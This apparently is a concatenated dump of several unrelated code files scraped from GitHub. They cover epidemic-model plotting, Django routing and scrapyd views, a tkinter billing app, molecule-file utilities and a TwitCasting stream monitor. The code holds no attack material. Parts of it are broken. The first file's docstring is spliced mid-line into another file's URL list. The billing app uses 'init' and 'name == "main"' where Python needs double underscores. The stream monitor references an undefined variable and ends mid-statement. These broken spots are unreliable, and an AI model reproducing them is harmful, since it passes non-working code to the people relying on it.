leg.get_frame().set_alpha(0.0)\n\n\ndef plot_states(ax, props, times, logscale=False, marker=-1, pop_size=-1):\n xvals = np.arange(times['st'], times['et'])\n\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n if marker > 0:\n ax.vlines(marker, 0.0005, 1, color='g')\n leg_labels = []\n for i, p in enumerate(props):\n yvals = list(p[2][times['si']:times['ei']])\n if len(yvals) < len(xvals):\n yvals.extend([0] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=colors[i])\n leg_labels.append(p[0])\n if logscale:\n ax.set_yscale('log')\n ymin = 1.0 / pop_size if pop_size > 0 else 0.0001\n ax.set_ylim((ymin, 1.0))\n leg = ax.legend(leg_labels, bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n ncol=len(props), mode=\"expand\", borderaxespad=0.)\n\n ax.set_ylabel('Fraction of population')\n\n\ndef plot_introductions(ax, times, start_time, end_time):\n colours = ['b', 'g', 'r', 'c', 'm', 'y', '0.25']\n for cur_size in range(1, 8):\n xvals = [x[1] for x in times if start_time < x[1] < end_time \\\n and x[0] == cur_size or (cur_size >= 7 and x[0] >= cur_size)]\n if len(xvals) > 0:\n ax.scatter(xvals, [0.001] * len(xvals), c=colours[cur_size - 1],\n marker='d', edgecolors='none')\n\n\ndef plot_hh_case_props(ax, props, start_index, end_index,\n start_time, end_time, t_dur):\n xvals = [x for x in zip(*props)[0] if x > start_time]\n i_begin = len(props) - len(xvals)\n\n tprops = list(zip(*props))\n colours = ['b', 'g', 'r', 'c', 'm', 'y', '0.25']\n b = np.zeros(len(tprops[1][i_begin:]))\n for i in range(1, len(tprops)):\n ax.bar(xvals, tprops[i][i_begin:], color=colours[i - 1], bottom=b,\n align='center', linewidth=0, width=16)\n b += tprops[i][i_begin:]\n\n # ax.plot(xvals, zip(*props)[1][i_begin:], c='b')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[2][i_begin:], c='g')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[3][i_begin:], c='r')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[4][i_begin:], c='c')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[5][i_begin:], c='m')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[6][i_begin:], c='y')#, edgecolors='none')\n\n ax.set_ylabel('Number of cases by household size')\n\n\ndef plot_immunity_by_hh_size(ax, rates, start_index, end_index, start_time,\n end_time, t_dur):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n for i, cur_size in enumerate(zip(*rates)):\n xvals = list(range(start_time, end_time + 1, t_dur))\n yvals = list(cur_size[start_index:end_index])\n print(t_dur)\n print(xvals)\n print((len(xvals), len(yvals)))\n if len(yvals) < len(xvals):\n yvals.extend([yvals[-1]] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=colors[i])\n leg_labels = ['%d' % (x + 1) for x in range(len(list(zip(*rates))))]\n leg_labels[-1] += '+'\n leg = ax.legend(leg_labels, loc=3, ncol=2, title='Household size',\n labelspacing=0.2, columnspacing=0.4, handletextpad=0.2)\n leg.get_frame().set_alpha(0.0)\n plt.setp(leg.get_texts(), fontsize='small')\n\n\ndef plot_inc_over_time(ax, data, age_bins, times, ylabel, ymax=-1, units='years'):\n leg_labels = ['%d-%d %s' % (x, y, units) \\\n for x, y in zip(age_bins[:-1], age_bins[1:])]\n for i, x in enumerate(zip(*data)):\n x_val = list(range(times['st'], times['et'], (times['et'] - times['st']) / len(x)))\n print((times['st'], times['et'], len(x_val), len(x)))\n print(x_val)\n ax.plot(x_val, x, color=colors[i % len(colors)])\n if ymax > 0:\n ax.set_ylim(ymax=ymax)\n leg = ax.legend(leg_labels) #, prop={'size':'large'})\n leg.get_frame().set_alpha(0.0)\n ax.set_ylabel(ylabel)\n\n\ndef plot_hh_fracs(ax, data, c='b', t_step=1):\n # print data\n d = list(zip(*data))\n x = np.array(d[0]) * t_step\n y = np.array(d[1])\n # print np.mean(y)\n ax.plot(x, y, color=c)\n ax.set_ylabel(\"Household fraction\")\n # ax.set_ylim(ymax=0.5)\n ax.set_ylim(ymin=0)\n\n\ndef plot_susc_prop(ax, data, c, times):\n # plots a single output series\n print(times)\n xvals = list(range(times['st'], times['et'] + 1, 1)) #364/times['t_per_year'])\n yvals = data\n print((len(xvals), len(yvals)))\n if len(yvals) < len(xvals):\n yvals.extend([yvals[-1]] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=c, marker='o', markeredgewidth=0, markersize=3)\n ax.set_yscale('log')\n ax.set_ylim(ymin=1e-4, ymax=1)\n\n\ndef plot_susc_props(ax, data, times):\n # plots a single output figure\n for i in range(0, max(data.keys()) + 1):\n plot_susc_prop(ax, data[i], colors[i], times)\n leg = ax.legend(list(range(0, max(data.keys()) + 1)), title='Number Susceptible') #, prop={'size':'large'})\n leg.get_frame().set_alpha(0.0)\n\n\ndef plot_hh_fracs_by_hh_size(ax, data, t_step=1):\n for i in range(1, 8):\n if data[i]:\n plot_hh_fracs(ax, data[i], colors[i - 1], t_step=t_step)\n\n\ndef plot_hh_fracs_multi(ax, hhf_mean, hhf_sd, label=\"\", color='b'):\n ax.set_xlabel(\"Days\")\n ax.set_ylabel(\"Household fraction\")\n xvals = list(range(len(hhf_mean)))\n if hhf_sd:\n ax.errorbar(xvals, hhf_mean, yerr=hhf_sd, label=label, color=color)\n else:\n ax.plot(xvals, hhf_mean, label=label, color=color)\n ax.set_ylim(ymin=0.0)\n\n\ndef plot_infection_immunity(ax, counts, ab, start_index, start_time=0,\n points_per_year=52, years_per_tick=5):\n plot_infection(ax, counts, start_index, start_time,\n points_per_year, years_per_tick)\n ax2 = ax.twinx()\n ax2.plot(list(range(start_index + start_time, start_time + len(ab))),\n ab[start_index:])\n ax2.set_ylabel('Mean antibody level')\n ax.set_xlim(xmin=start_index + start_time, xmax=start_time + len(counts))\n ax.set_xticks(list(range(start_index + start_time, start_time + len(counts),\n points_per_year * years_per_tick)))\n ax.set_xticklabels(list(range(0, len(counts) / points_per_year, years_per_tick)))\n\n\ndef plot_cases(ax, counts, bins, xlabel):\n ax.bar(bins[:-1] - 0.4, counts, width=0.8)\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Cases')\n ax.set_xlim(xmin=-0.5)\n\n\ndef plot_incidence_line(ax, counts, errs, xlabel, label=None, color='b'):\n ax.plot(list(range(len(counts))), counts, label=label, lw=1.5, color=color)\n if errs is not None:\n ax.errorbar(list(range(len(counts))), counts, yerr=errs, color=color, capsize=0, alpha=0.4)\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Incidence')\n ax.set_ylim(ymin=0.0)\n ax.set_xlim(xmax=100)\n\n\ndef plot_incidence(ax, counts, state_labels, bins, xlabel,\n labels=None, y_max=-1, x_max=-1):\n b = np.zeros(len(counts[state_labels[0]]))\n for i, label in enumerate(state_labels):\n if label not in counts: continue\n ax.bar(bins[:-1], counts[label], color=colors[i], bottom=b,\n align='center', linewidth=0, width=0.8)\n b += counts[label]\n\n # ax.bar(bins[:-1]-0.4, counts, width=0.8)\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Incidence')\n ax.set_xlim(xmin=bins[0] - 0.5)\n if x_max > 0:\n ax.set_xlim(xmax=x_max)\n else:\n ax.set_xlim(xmax=bins[-1] - 0.5)\n\n if labels:\n ax.set_xticks(list(range(len(labels))))\n ax.set_xticklabels(labels)\n\n if y_max > 0:\n ax.set_ylim(ymax=y_max)\n\n\ndef plot_age_inc_diffs(ax, counts):\n ax.bar(list(range(len(counts))), counts, align='center', linewidth=0, width=0.8)\n\n\ndef plot_inc_total_sweep(ax, means, stdevs, param_values):\n xvals = list(range(len(param_values)))\n ax.bar(xvals, means, yerr=stdevs, align='center')\n ax.set_xticks(xvals)\n ax.set_xticklabels([str(x) for x in param_values])\n ax.set_ylabel('Cases')\n\n\ndef plot_ab_snapshot(ax, snapshot, binsize=5):\n binned = []\n cur_bin = []\n for i, x in list(snapshot.items()):\n # print i, x\n cur_bin.extend(x)\n if i % binsize == 0:\n binned.append(cur_bin)\n cur_bin = []\n # print binned\n\n ax.boxplot(binned, positions=list(range(0, len(binned)))) #, widths=3)\n ax.set_xlabel('Age')\n ax.set_ylabel('Antibody level')\n\n\ndef bin_ab_level(snapshot, cutoffs=(5, 62.5, 125),\n bins=(1, 2, 3, 4, 5, 6, 7, 8, 9, 14, 19, 24, 34, 44, 59, 74)):\n cutoffs = list(cutoffs) + [10000]\n bins = list(bins) + [2000]\n counts = np.zeros((len(bins), len(cutoffs)))\n for cur_age, ab_levels in list(snapshot.items()):\n i = 0\n while cur_age >= bins[i]:\n i += 1\n for ab in ab_levels:\n j = 0\n while ab >= cutoffs[j]:\n j += 1\n counts[i][j] += 1\n\n return counts\n\n\ndef build_ab_legend_labels(cutoffs):\n \"\"\"\n Create a list of series labels based upon cutoffs as follows:\n ['/\", views.MusicianDetailView.as_view()),\n path(\n \"musicians//albums/\",\n views.MusicianAlbumView.as_view(),\n ),\n path(\n \"musicians//albums//songs/\",\n views.MusicianAlbumSongsView.as_view(),\n name=\"create_song\",\n ),\n path(\"schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n # Opcionais\n path(\n \"schema/swagger-ui/\",\n SpectacularSwaggerView.as_view(url_name=\"schema\"),\n name=\"swagger-ui\",\n ),\n path(\n \"schema/redoc/\",\n SpectacularRedocView.as_view(url_name=\"schema\"),\n name=\"redoc\",\n ),\n]\n","repo_name":"Kenzie-Academy-Brasil-Developers/m5-s6-bandkamp-caiogiffoni","sub_path":"musicians/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73307912737","text":"from uuid import uuid4\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom scrapyd_api import ScrapydAPI\n\nfrom .models import ScrapyItem\n\n# Create your views here.\n\nscrapyd = ScrapydAPI('http://localhost:6800')\n\n\ndef get_statements(request):\n unique_id = str(uuid4())\n\n settings = {\n 'unique_id': unique_id\n }\n\n task = scrapyd.schedule('default', 'ibmandiri', settings=settings, to_crawl='otjlsjflask')\n\n return JsonResponse({\n 'task_id': task,\n 'unique_id': unique_id,\n 'status': 'started',\n 'url': '/check_job?unique_id={}&task_id={}'.format(unique_id, task)\n })\n\n\ndef check_job_get_statements(request):\n task_id = request.GET.get('task_id')\n unique_id = request.GET.get('unique_id')\n\n status = scrapyd.job_status('default', task_id)\n if status == 'finished':\n item = ScrapyItem.objects.get(unique_id=unique_id)\n return JsonResponse(item.to_dict())\n return JsonResponse({'status': status})\n\n","repo_name":"ihfazhillah/explore-scrapy","sub_path":"ibanking_web/ibanking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32691089154","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport json\nimport os\n\nclass Product:\n def init(self, name, price):\n self.name = name\n self.price = price\n\nclass InvoiceItem:\n def init(self, product, quantity):\n self.product = product\n self.quantity = quantity\n\nclass Customer:\n def init(self, name, email):\n self.name = name\n self.email = email\n\nclass BillingApp:\n def init(self, root):\n self.root = root\n self.root.title(\"Billing System\")\n\n self.products = []\n self.invoice_items = []\n self.customers = []\n\n # Load existing data from files\n self.load_data()\n\n # Create a label for product name\n self.label_product = tk.Label(root, text=\"Product Name:\")\n self.label_product.pack()\n\n # Create an entry for product name\n self.entry_product = tk.Entry(root)\n self.entry_product.pack()\n\n # Create a label for product price\n self.label_price = tk.Label(root, text=\"Price:\")\n self.label_price.pack()\n\n # Create an entry for product price\n self.entry_price = tk.Entry(root)\n self.entry_price.pack()\n\n # Create a label for quantity\n self.label_quantity = tk.Label(root, text=\"Quantity:\")\n self.label_quantity.pack()\n\n # Create an entry for quantity\n self.entry_quantity = tk.Entry(root)\n self.entry_quantity.pack()\n\n # Create a button to add a product\n self.add_button = tk.Button(root, text=\"Add Product\", command=self.add_product)\n self.add_button.pack()\n\n # Create a listbox to display added products\n self.product_listbox = tk.Listbox(root)\n self.product_listbox.pack()\n\n # Create a label for customer name\n self.label_customer_name = tk.Label(root, text=\"Customer Name:\")\n self.label_customer_name.pack()\n\n # Create an entry for customer name\n self.entry_customer_name = tk.Entry(root)\n self.entry_customer_name.pack()\n\n # Create a label for customer email\n self.label_customer_email = tk.Label(root, text=\"Customer Email:\")\n self.label_customer_email.pack()\n\n # Create an entry for customer email\n self.entry_customer_email = tk.Entry(root)\n self.entry_customer_email.pack()\n\n # Create a button to add a customer\n self.add_customer_button = tk.Button(root, text=\"Add Customer\", command=self.add_customer)\n self.add_customer_button.pack()\n\n # Create a label to display the customer's details\n self.label_customer_details = tk.Label(root, text=\"\")\n self.label_customer_details.pack()\n\n # Create a button to generate an invoice\n self.generate_button = tk.Button(root, text=\"Generate Invoice\", command=self.generate_invoice)\n self.generate_button.pack()\n\n # Create a label to display the total amount\n self.label_total = tk.Label(root, text=\"\")\n self.label_total.pack()\n\n # Create a button to save data\n self.save_button = tk.Button(root, text=\"Save Data\", command=self.save_data)\n self.save_button.pack()\n\n def add_product(self):\n name = self.entry_product.get()\n price = float(self.entry_price.get())\n quantity = int(self.entry_quantity.get())\n\n product = Product(name, price)\n item = InvoiceItem(product, quantity)\n\n self.products.append(product)\n self.invoice_items.append(item)\n\n self.product_listbox.insert(tk.END, f\"{name} - ${price:.2f} x {quantity}\")\n\n # Clear input fields\n self.entry_product.delete(0, tk.END)\n self.entry_price.delete(0, tk.END)\n self.entry_quantity.delete(0, tk.END)\n\n def add_customer(self):\n name = self.entry_customer_name.get()\n email = self.entry_customer_email.get()\n\n customer = Customer(name, email)\n self.customers.append(customer)\n\n self.label_customer_details.config(text=f\"Customer: {name} ({email})\")\n # Clear input fields\n self.entry_customer_name.delete(0, tk.END)\n self.entry_customer_email.delete(0, tk.END)\n\n def generate_invoice(self):\n if not self.invoice_items:\n messagebox.showinfo(\"Error\", \"No items in the invoice.\")\n return\n\n total = sum(item.product.price * item.quantity for item in self.invoice_items)\n customer_details = self.label_customer_details.cget(\"text\")\n\n if not customer_details:\n messagebox.showinfo(\"Error\", \"Please add a customer.\")\n return\n\n messagebox.showinfo(\"Invoice\", f\"Invoice for {customer_details}\\nTotal Amount: ${total:.2f}\")\n\n def save_data(self):\n data = {\n \"products\": [(p.name, p.price) for p in self.products],\n \"customers\": [(c.name, c.email) for c in self.customers],\n }\n\n with open(\"billing_data.json\", \"w\") as file:\n json.dump(data, file)\n\n messagebox.showinfo(\"Saved\", \"Data has been saved to billing_data.json\")\n\n def load_data(self):\n if os.path.exists(\"billing_data.json\"):\n with open(\"billing_data.json\", \"r\") as file:\n data = json.load(file)\n\n for name, price in data[\"products\"]:\n self.products.append(Product(name, price))\n\n for name, email in data[\"customers\"]:\n self.customers.append(Customer(name, email))\n\ndef main():\n root = tk.Tk()\n app = BillingApp(root)\n root.mainloop()\n\nif name == \"main\":\n main()\n","repo_name":"ihimanshsharma/Billing_Software","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73375379617","text":"import os.path\nimport yaml\n\npath = os.path.dirname(os.path.realpath(__file__)) + '/conversion_file/'\n\ndef load_ff(ff = 'charmm'):\n\tif ff == 'charmm':\n\t\twith open(f'{path}charmm2sybyl.yml') as c2s:\n\t\t\treturn yaml.load(c2s, Loader=yaml.FullLoader)\n\telif ff == 'amber':\n\t\twith open(f'{path}amber2sybyl.yml') as c2s:\n\t\t\treturn yaml.load(c2s, Loader=yaml.FullLoader)\n\telif ff is None:\n\t\treturn None\n\telse:\n\t\traise ValueError(f'Unrecognized forcefield {ff}')\n\n\treturn ff_conversion\n\ndef load_pdb_c(pdb_c):\n\t\tif pdb_c is not None:\n\t\t\twith open(pdb_c) as p:\n\t\t\t\treturn yaml.load(p, Loader=yaml.FullLoader)\n\t\telse:\n\t\t\treturn None\n\ndef get_path_files(folder):\n\t\tif os.path.isdir(folder):\n\n\t\t\tlist_file=[]\n\n\t\t\tfiles = os.listdir(folder)\n\n\t\t\tfor f in files:\n\t\t\t\tlist_file.append(f'{folder}/{f}')\n\t\t\treturn sorted(list_file)\n\n\t\telse:\n\t\t\treturn None\n\ndef print_progress (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\", refreshRate=0.01):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)\n # Print New Line on Complete\n if iteration == total: \n print()","repo_name":"LIT-CCM-lab/OCSVM-ADRB2","sub_path":"mol2_trajectory/mol2_trajectory/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"8643479074","text":"import asyncio\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nfrom datetime import datetime\nimport aiohttp\nimport requests\nfrom pathlib import Path\nfrom bs4 import BeautifulSoup\nfrom requests.adapters import HTTPAdapter\nimport const\nfrom log import create_logger\nimport base64\n\n\nCLIENT_ID = const.CLIENT_ID\nCLIENT_SECRET = const.CLIENT_SECRET\nACCESS_TOKEN = base64.b64encode(f\"{CLIENT_ID}:{CLIENT_SECRET}\".encode()).decode(\"utf-8\")\n\n\ndef check_file(live_date, live_title, live_id, streamer, output_path):\n file_name = f'{live_date} - {live_title} ({live_id}).mp4'\n try:\n if os.path.isfile(f'{output_path}\\\\{streamer}\\\\{file_name}'):\n live_date = f'{live_date}{str(time.strftime(\"%H%M%S\"))}'\n file_name = f'{live_date} - {live_title} ({live_id}).mp4'\n except Exception as e:\n logger.debug(e)\n finally:\n return file_name\n\n\ndef loading_text():\n loading_string = \"Waiting for live twitcasting streams \"\n animation = [\" \", \". \", \".. \", \"... \", \".... \", \".....\"]\n idx = 0\n while True:\n print(f\"[INFO] {datetime.now().replace(microsecond=0)} | \" + loading_string + animation[idx % len(animation)], end=\"\\r\")\n time.sleep(0.3)\n idx += 1\n if idx == 6:\n idx = 0\n\n\ndef format_url_message(user_id, live_id, live_message, live_url):\n live_message = live_message.replace(\"protected\", \"`protected`\").replace(\"member's only\", \"`member's only`\")\n if \"_\" in user_id[0] or \"_\" in user_id[-1] or \"__\" in user_id:\n live_message = live_message.replace(user_id, f\"`{user_id}`\")\n if \"__\" not in user_id:\n live_url = f\"`https://twitcasting.tv/{user_id}/movie/{live_id}`\"\n return live_message, live_url\n return live_message, live_url\n\n\ndef get_secondary_title(res):\n try:\n temp_live_title = res['movie']['title']\n temp_live_comment = res['movie']['last_owner_comment']\n temp_live_subtitle = res['movie']['subtitle']\n if temp_live_comment is not None and temp_live_title != temp_live_comment:\n return temp_live_comment.replace(\"\\\\n\", \"\\n\")\n elif temp_live_subtitle is not None and temp_live_title != temp_live_subtitle:\n return temp_live_subtitle.replace(\"\\\\n\", \"\\n\")\n else:\n return res['broadcaster']['screen_id']\n except KeyError as kError:\n logger.error(kError, exc_info=True)\n return temp_live_title\n\n\ndef get_passwords():\n try:\n if PASSWORD_PATH is None or PASSWORD_PATH == \"\":\n return None\n with open(PASSWORD_PATH, mode='r', encoding=\"utf-8\") as password_file:\n lines = password_file.readlines()\n passwords = {line.rstrip() for line in lines}\n return passwords\n except Exception as e:\n logger.error(e)\n logger.error(\"Error getting password list\")\n return None\n\n\n# This endpoint can catch membership streams but may rate limit after a while\nasync def fetch_html(session, user_id):\n headers = {'Accept': 'application/json'}\n url = f\"https://twitcasting.tv/streamserver.php?target={user_id}&mode=client\"\n res = await session.get(url, headers=headers)\n return res, user_id\n\n\nasync def get_lives():\n tasks = []\n live_streams = []\n rate_limit = False\n async with aiohttp.ClientSession() as session:\n for user_id in user_ids:\n tasks.append(fetch_html(session, user_id))\n results = await asyncio.gather(*tasks)\n for result in results:\n try:\n res = await result[0].json(content_type=None)\n except json.JSONDecodeError as jsonDecodeError:\n logger.debug(jsonDecodeError)\n logger.debug(result)\n logger.debug(f\"Error {result[0].status}: {result[0].reason}\")\n rate_limit = True\n res = {}\n await asyncio.sleep(1)\n except aiohttp.ClientError as clientError:\n logger.debug(clientError)\n logger.debug(result)\n logger.debug(f\"Error {result[0].status}: {result[0].reason}\")\n rate_limit = True\n res = {}\n await asyncio.sleep(1)\n id = result[1]\n if not res:\n res = {'error': True}\n\n live_streams.append((res, id))\n if rate_limit:\n # TODO maybe switch api instead\n time.sleep(5)\n return live_streams\n\n\n# Used to check the latest movie to see if it's live and/or is a member's only stream\ndef check_latest_live(user_id, session, logger):\n try:\n headers = {'Authorization': f'Basic {ACCESS_TOKEN}',\n 'Accept': 'application/json',\n 'X-Api-Version': '2.0'}\n response = session.get(f\"https://apiv2.twitcasting.tv/users/{user_id}/movies?limit=1\",\n headers=headers)\n if response.status_code == 401:\n logger.error(\"Error with tokens\")\n res = response.json()\n logger.debug(res)\n logger.debug(response.status_code)\n try:\n response = session.get(f\"https://apiv2.twitcasting.tv/users/{user_id}\", headers=headers).json()\n if response.status_code == 401:\n logger.error(\"Error with tokens\")\n user_res = response.json()\n # If the stream is live then it's a member's only live stream\n if len(res['movies']) != 0:\n res_data = {'movie': res['movies'][0], 'broadcaster': user_res['user']}\n logger.debug(res_data)\n return res_data\n else:\n return {}\n except TypeError:\n res_data = {'movie': data['movies'][0],\n 'broadcaster': {'screen_id': user_id, 'image': res['movies'][0]['large_thumbnail']}}\n return res_data\n\n except requests.exceptions.ConnectionError as cError:\n logger.debug(cError)\n return {}\n except (requests.exceptions.RequestException, json.decoder.JSONDecodeError) as rerror:\n logger.error(rerror)\n return {}\n except Exception as e:\n logger.debug(res)\n logger.debug(e)\n return {}\n\n\ndef poll_member_stream(user_id):\n membership_status = False\n member_data = {}\n try:\n page_res = requests.get(f\"https://twitcasting.tv/{user_id}/show/\").text\n soup = BeautifulSoup(page_res, \"html.parser\")\n first_video_element = soup.find(\"div\", class_=\"recorded-movie-box\").find(\"a\", class_=\"tw-movie-thumbnail\")\n # sometimes tw-movie-thumbnail-title-icon does not exist if grabbed too early but no issues as it can repoll\n # if is issue either give up or get tw-movie-thumbnail-image as a replacement but link can't be viewed probably\n member_icon_element = first_video_element.find(\"img\", class_=\"tw-movie-thumbnail-title-icon\")['src']\n membership_status = True if \"member\" in member_icon_element else False\n # If this endpoint returns False on is_on_live then it's likely a member only stream\n logger.debug(f\"{user_id} member stream: {membership_status}\")\n movie_title_element = first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-title\")\n if movie_title_element is not None:\n movie_title = movie_title_element.text.strip()\n else:\n movie_title = user_id\n movie_subtitle_element = first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-label\")\n if movie_subtitle_element is not None:\n movie_subtitle = first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-label\").text.lstrip().rstrip()\n else:\n movie_subtitle = movie_title\n is_protected = True if len(first_video_element.find(\"span\", class_=\"tw-movie-thumbnail-title\")\n .find_all(\"img\", class_=\"tw-movie-thumbnail-title-icon\")) > 1 else False\n image = soup.find(\"a\", class_=\"tw-user-nav-icon\").find(\"img\", recursive=False)['src']\n thumbnail = soup.find(\"img\", class_=\"tw-movie-thumbnail-image\")['src']\n date = first_video_element.find(\"img\", class_=\"tw-movie-thumbnail-image\")['title'][:10].replace(\"/\", \"\")\n member_data = {'title': movie_title, 'subtitle': movie_subtitle, 'is_protected': is_protected, 'date': date,\n 'image': f'https:{image}', 'thumbnail': thumbnail}\n except KeyError as kError:\n logger.debug(page_res)\n logger.error(kError, exc_info=True)\n except AttributeError as aError:\n logger.debug(page_res)\n logger.error(aError, exc_info=True)\n except Exception as e:\n logger.debug(page_res)\n logger.error(e, exc_info=True)\n finally:\n return membership_status, member_data\n\n\ndef check_member_stream(user_id):\n headers = {'Accept': 'application/json'}\n url = f\"https://frontendapi.twitcasting.tv/users/{user_id}/latest-movie\"\n res = requests.get(url, headers=headers).json()\n try:\n # If this endpoint returns False on is_on_live then it's likely a member only stream\n if not res['movie']['is_on_live']:\n return True\n else:\n return False\n except KeyError as kError:\n # If this endpoint contains any empty movie dictionary then it's likely a member only stream\n logger.debug(kError)\n return True\n\n\ndef add_live_users(lives):\n for stream in lives:\n stream_json = stream[0]\n streamer_name = stream[1]\n try:\n if len(stream_json) != 0 and stream_json['movie']['live']:\n movie_id = stream_json['movie']['id']\n if movie_id != user_ids[streamer_name]['movie_id']:\n user_ids[streamer_name] = {\"movie_id\": movie_id,\n \"notified\": False,\n \"downloaded\": False,\n \"type\": \"Live\"}\n else:\n try:\n if user_ids[streamer_name][\"movie_id\"] is not None and 'error' not in stream_json:\n # logger.info(f\"{streamer_name} is now offline{' ' * 25}\\n\")\n logger.info(f\"{streamer_name} is now offline{' '*25}\")\n except Exception as e:\n logger.error(e)\n user_ids[streamer_name] = {\"movie_id\": None,\n \"notified\": False,\n \"downloaded\": False,\n \"type\": None}\n except Exception as e:\n logger.debug(e)\n continue\n\n\nif __name__ == \"__main__\":\n logger = create_logger()\n logger.info(\"Starting program\")\n\n # Setup\n SLEEP_TIME = const.SLEEP_TIME\n WEBHOOK_URL = const.WEBHOOK_URL\n\n try:\n PASSWORD_PATH = Path(const.PASSWORD_PATH).resolve()\n except Exception:\n logger.error(\"There is a problem with the password path\")\n\n logger.debug(f'Authorization: Basic {ACCESS_TOKEN}')\n\n COOKIES = []\n if const.COOKIES is not None:\n if '--cookies-from-browser' in const.COOKIES:\n COOKIES = const.COOKIES.split(maxsplit=1)\n else:\n COOKIES = ['--cookies', const.COOKIES]\n\n # Dictionary comprehension of the list of twitcasting users\n user_ids = {user_id: {\"movie_id\": None, \"notified\": False, \"downloaded\": False, \"type\": None} for user_id in\n const.user_ids}\n\n # Setup session\n session = requests.Session()\n session.mount(\"https://\", HTTPAdapter(max_retries=5))\n live_streams = set()\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n threading.Thread(target=loading_text).start()\n\n # Get output path and if it ends with backward slash then remove it\n if const.OUTPUT_PATH is not None or \"\":\n output_path = Path(const.OUTPUT_PATH).resolve()\n else:\n output_path = os.getcwd()\n while True:\n try:\n # logger.debug(user_ids)\n time.sleep(1)\n # logger.debug(\"Fetching Lives...\")\n # Check whether user is currently like\n try:\n lives = asyncio.run(get_lives())\n logger.debug(lives)\n except aiohttp.ServerDisconnectedError as server_error:\n logger.error(f\"{server_error}{' '*22}\")\n continue\n except aiohttp.ClientOSError as client_error:\n logger.error(f\"{client_error}{' '*20}\")\n except Exception as e:\n logger.error(e)\n continue\n add_live_users(lives)\n for user_id, user_data in user_ids.items():\n try:\n if user_data['movie_id'] is not None and not user_data['notified']:\n res = {}\n headers = {'Authorization': f'Basic {ACCESS_TOKEN}',\n 'Accept': 'application/json',\n 'X-Api-Version': '2.0'}\n response = session.get(f\"https://apiv2.twitcasting.tv/users/{user_id}/current_live\",\n headers=headers)\n if response.status_code == 401:\n logger.error(\"Error with tokens\")\n continue\n res = response.json()\n logger.debug(res)\n live_url = f\"https://twitcasting.tv/{user_id}/movie/{user_data['movie_id']}\"\n if 'movie_id' in res and res['movie_id'] is not None:\n # Check if it's a member's only stream\n is_member = check_member_stream(user_id)\n logger.debug(is_member)\n if is_member:\n res['member_only'] = True\n else:\n # logger.info(f\"{user_id} is currently offline...\")\n continue\n except requests.exceptions.ConnectionError as cError:\n logger.error(cError)\n except (requests.exceptions.RequestException, json.decoder.JSONDecodeError) as rerror:\n logger.error(rerror)\n continue\n # If res returns a json with an error key then it is not currently live\n if 'error' in res and res['error']['code'] == 404:\n error_res = res\n res = check_latest_live(user_id, session, logger)\n if res == {}:\n member_res, data = poll_member_stream(user_id)\n # maybe also checking member_res is not necessary\n if member_res and user_ids[user_id][\"type\"] == \"Live\":\n # For now use live thumbnail instead of pfp\n try:\n res = {'movie': {'id': user_ids[user_id]['movie_id'], 'title': data['title'],\n 'subtitle': data['subtitle'],\n 'last_owner_comment': None, 'is_protected': data['is_protected'],\n 'date': data['date'],\n 'member_thumbnail': data['thumbnail']},\n 'broadcaster': {'screen_id': user_id,\n 'image': data['image']},\n 'member_only': True}\n logger.debug(res)\n except Exception as e:\n logger.error(e, exc_info=True)\n else:\n continue\n else:\n res['member_only'] = True\n res['movie']['member_thumbnail'] = res['movie']['small_thumbnail']\n # If the request could not be sent due to an invalid bearer token\n if error_res['error']['code'] == 1000:\n logger.error(\"Invalid bearer token\")\n quit()\n # TODO set default values in event not found\n try:\n member_only = res['member_only'] if 'member_only' in res else False\n protected = res['movie']['is_protected'] if 'is_protected' in res['movie'] else False\n live_id = res['movie']['id']\n screen_id = res['broadcaster']['screen_id']\n user_image = res['broadcaster']['image']\n live_title = res['movie']['title']\n live_comment = get_secondary_title(res)\n if 'member_thumbnail' not in res['movie']:\n if 'large_thumbnail' in res['movie']:\n live_thumbnail = res['movie']['large_thumbnail']\n else:\n live_thumbnail = f\"https://apiv2.twitcasting.tv/users/{user_id}/live/thumbnail?size=large&position=latest\"\n else:\n live_thumbnail = res['movie']['member_thumbnail']\n if 'created' in 